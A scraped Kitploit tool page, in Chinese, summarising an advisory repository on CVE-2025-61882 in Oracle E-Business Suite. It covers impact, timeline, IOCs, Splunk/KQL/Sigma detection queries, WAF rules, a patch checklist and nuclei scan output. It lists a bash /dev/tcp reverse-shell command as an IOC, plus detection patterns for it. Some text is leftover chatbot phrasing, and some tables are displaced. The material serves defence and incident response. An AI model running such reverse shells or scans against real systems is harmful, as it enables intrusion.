Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Blackash-CVE-2025-61882 — 提供详细的CVE-2025-61882公告,包含技术分析、IOC、检测查询,以及基于nuclei的Oracle E-Business Suite预认证RCE漏洞利用模板。 | Kitploit
工具/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
漏洞分析漏洞利用Web安全渗透测试威胁情报事件响应
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

提供详细的CVE-2025-61882公告,包含技术分析、IOC、检测查询,以及基于nuclei的Oracle E-Business Suite预认证RCE漏洞利用模板。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
2711个月前尚未审核
分享

🛡️🚨 CVE‑2025‑61882 — Oracle E‑Business Suite (EBS) 中的严重预认证远程代码执行漏洞 🚨🛡️

简要概述:Oracle E‑Business Suite (EBS) 中存在严重的预认证远程代码执行漏洞 — 影响 12.2.3 → 12.2.14 版本,CVSS 评分为 9.8,已在野外被积极利用(据报道存在勒索/敲诈活动)。([oracle.com][1])


📌 快速事实(表格)

字段详情
🆔 CVECVE‑2025‑61882
🧾 产品 / 组件Oracle E‑Business Suite (EBS) — 并发处理 / BI Publisher 集成
📦 受影响版本12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ 类型远程代码执行 (RCE) — 无需身份验证
🔥 已在野外被利用是 — 据报道存在大规模利用 / 敲诈活动
📅 披露 / 时间线2025 年 10 月(供应商公告 + 公开分析文章)。([oracle.com][1])

(以上内容综合自供应商公告、NVD/CISA 及多家供应商分析。) ([oracle.com][1])


💥 影响(表格)

影响领域含义
🔓 机密性攻击者可读取敏感的 HR/财务/ERP 数据
🛠️ 完整性攻击者可修改记录、创建后门或更改配置
⚡ 可用性攻击者可中断服务、执行勒索软件或破坏备份
🧭 风险等级极高 — 关键 ERP 系统上的预认证 RCE → 可能导致整个域被接管

参考资料报告了高影响利用和勒索软件关联。([Rapid7][2])


🛠️ 技术摘要(简明)

  • 攻击向量: 对暴露的 EBS Web 端点的 HTTP/HTTPS 请求触发并发处理 / BI Publisher 集成中的漏洞链,导致远程代码执行。([oracle.com][1])
  • 复杂度: 低(无需身份验证,无需用户交互)。([nvd.nist.gov][3])
  • 已观察到的载荷: 反弹 Shell 模式、Web Shell、用于数据窃取和敲诈的投放脚本。([Rapid7][2])

🕵️‍♀️ 入侵指标 (IOC) — 示例(表格)

Oracle 和事件响应人员发布了 IOC;以下是公告和供应商分析文章中报告的代表性示例。请在日志和端点中搜索这些模式。([oracle.com][1])

类型示例
🌐 IP 地址(已观察到)200.107.207.26, (报告的示例地址)

如果您需要完整 IOC 列表(IP 地址、完整哈希、文件名),我可以粘贴在此 — 请说“粘贴 IOC”。(无链接。)


🧭 时间线(精简)

日期事件
2025 年 8 月 9 日最早报告的现实中利用活动(供应商遥测)。([crowdstrike.com][4])
2025 年 10 月初Oracle 发布了 EBS 的安全警报 / 补丁。([oracle.com][1])
2025 年 10 月 6‑7 日CISA 将该 CVE 添加到其已知被利用漏洞 (KEV) 目录(联邦机构指南,缓解截止日期)。([cisa.gov][5])
2025 年 10 月(持续中)多家供应商发布分析文章和大规模利用报告(CrowdStrike、Rapid7、Tenable 等)。([crowdstrike.com][4])

✅ 立即建议采取的行动(步骤表格)


💀 漏洞利用:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml                        

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.
CVE-2025-61882 Oracle E-Business Suite 1 CVE-2025-61882 Oracle E-Business Suite 4

🕵️‍♂️ 示例检测查询(可直接复制粘贴)

Splunk(搜索反弹 Shell 模式):

root@kitploit:~
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*") 
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw

ELK / Kibana (KQL):

root@kitploit:~
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"

Sigma 规则(概念性):

root@kitploit:~
title: Oracle EBS Reverse Shell via HTTP
detection:
  selection:
    EventID: 1234
    ProcessCommandLine|contains: "/dev/tcp/"
  condition: selection

(根据您的日志架构调整字段名称;使用 IOC 进行细化。)


🔐 示例防火墙 / WAF 缓解措施(示例)

  • 网络 ACL: 阻止来自公共互联网对 EBS 服务器的入站 80/443 访问;仅允许管理 VPN 和特定管理员 IP。
  • WAF 规则(伪代码): 阻止在 POST 主体或 URL 参数中包含 bash -i、/dev/tcp/、base64 -d 或典型漏洞利用载荷模式的请求。
  • 速率限制 / 地理封锁: 临时对 EBS 端点的请求进行速率限制,并在符合业务需求的情况下阻止来自已知恶意地理区域的流量。

🧾 补丁检查清单(快速)

  1. 进行备份并创建 VM 镜像快照 ✅
  2. 在暂存环境中测试补丁(如可能) ✅
  3. 将 Oracle 安全警报补丁应用于 EBS 12.2.3–12.2.14 ✅(遵循供应商步骤:停止服务、应用补丁、运行安装后任务)([oracle.com][1])
  4. 重启并验证服务健康状态 ✅
  5. 重新扫描入侵痕迹并运行完整的主机取证检查 ✅

🧠 威胁行为者 / 利用说明

  • 多家供应商将活跃利用归因于与敲诈/勒索软件相关的组织(例如 Cl0p / Graceful Spider 或相关行为者)— 用于数据窃取和敲诈。归因置信度因供应商而异。([crowdstrike.com][4])

📋 面向 SOC / IR 团队 — 行动手册检查清单

  • 分类: 入站利用尝试?捕获 HTTP 请求、请求头、POST 主体。
  • 遏制: 隔离受影响主机的网络。
  • 取证: 收集内存、磁盘镜像、Web 服务器日志、审计日志。
  • 修复: 如确认被入侵,从干净镜像重建主机。
  • 恢复: 从已知良好的备份恢复;轮换凭据。
  • 报告: 记录事件,通知利益相关者,如适用则遵守 KEV/CISA 指南。([nvd.nist.gov][3])

🔎 来源(权威报告的简短列表)

(我列出来源以确保准确性 — 我不会在此粘贴链接,但以下是供应商/机构名称,以便您在需要时参考。)

  • Oracle 安全警报 / 补丁可用性(供应商公告)。([oracle.com][1])
  • NVD / CISA(CISA KEV 目录条目和 NVD 元数据)。([nvd.nist.gov][3])
  • CrowdStrike 关于攻击活动的技术报告。([crowdstrike.com][4])
  • Rapid7 / Tenable / 其他供应商分析和常见问题解答。([Rapid7][2])

以下是您可以在 CVE‑2025‑61882 报告中使用的专业、表情符号丰富的免责声明:


⚠️💀 免责声明 💀⚠️

本报告中提供的信息仅用于意识提升、防御和教育目的。 使用此信息利用、攻击或入侵任何系统,未经明确授权均属违法行为,可能导致刑事和民事处罚。

🔒 始终应用推荐的补丁,遵循安全最佳实践,并且仅在受控环境中进行测试。

🧾 本报告不能替代官方供应商公告 — 始终咨询 Oracle 安全警报和授权指南以获取权威的修复说明。


下载工具
185.181.60.11
🧾 命令模式sh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1(反弹 Shell)
🗂️ 文件哈希疑似利用脚本的多个 SHA‑256 哈希(完整列表请参阅供应商公告)
🕳️ 痕迹意外的 Web Shell、新增 cron 任务、到异常 IP/端口 的可疑出站连接
优先级行动备注 / 示例具体信息
1️⃣ 严重修补受影响的 EBS 实例立即为 12.2.3–12.2.14 版本应用 Oracle 安全警报补丁。([oracle.com][1])
2️⃣ 高隔离 / 限制对 EBS Web 端点的访问阻止面向互联网的 HTTP/HTTPS 访问 EBS;仅允许受信任的管理员 IP 或 VPN。
3️⃣ 高启用/调整 WAF 规则为利用模式部署供应商/社区 WAF 签名;阻止可疑载荷。([Rapid7][2])
4️⃣ 高搜索与检测在日志中搜索反弹 Shell 命令、异常文件写入以及与 IOC 的出站连接。
5️⃣ 事件响应遏制与响应(如发现被入侵)隔离主机,保留取证证据,更改凭据,从干净的备份重建。
6️⃣ 策略报告与通知如果您受监管/合同要求约束,请按照政策通知利益相关者和当局(可能适用 CISA/KEV 指南)。([nvd.nist.gov][3])